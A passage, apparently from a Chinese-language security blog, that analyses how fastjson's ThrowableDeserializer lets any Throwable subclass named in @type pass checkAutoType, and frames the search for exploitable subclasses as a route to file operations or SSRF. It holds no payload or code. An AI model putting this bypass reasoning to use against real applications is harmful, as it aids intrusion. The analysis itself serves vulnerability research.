JavaBeanDeserializer#deserialze
ThrowableDeserializer#deserialze

另外，两参 checkAutoType 也调用了三参 checkAutoType ，但是 expectClass 依然是传入的，而且两参 checkAutoType 被调用的点 expectClass 都是被设置为 null ，所以没有利用价值：

ThrowableDeserializer#deserialze

调用点在这里：

它会将 @type 对应的值传入第一个参数，Throwable.class 作为 expectClass 的值：

也就是说 @type 对应的类是 Throwable 的子类的话，通过 checkAutoType 的检查。

然后调用 createException 方法创建异常类：

跟进 ThrowableDeserializer#createException(String, Throwable, Class<?>)，最后在这里实例化：

那么核心点就在于找一个 Throwable 的子类，它的 getter/setter/static block/constructor 中有可利用的点，或者其他地方有可利用的链。从这个版本开始，再想要 RCE 就比较难了，大部分情况下考虑对文件的操作以及 SSRF 之类，而且可利用的链通常需要很多依赖。这个就留待后续说明吧。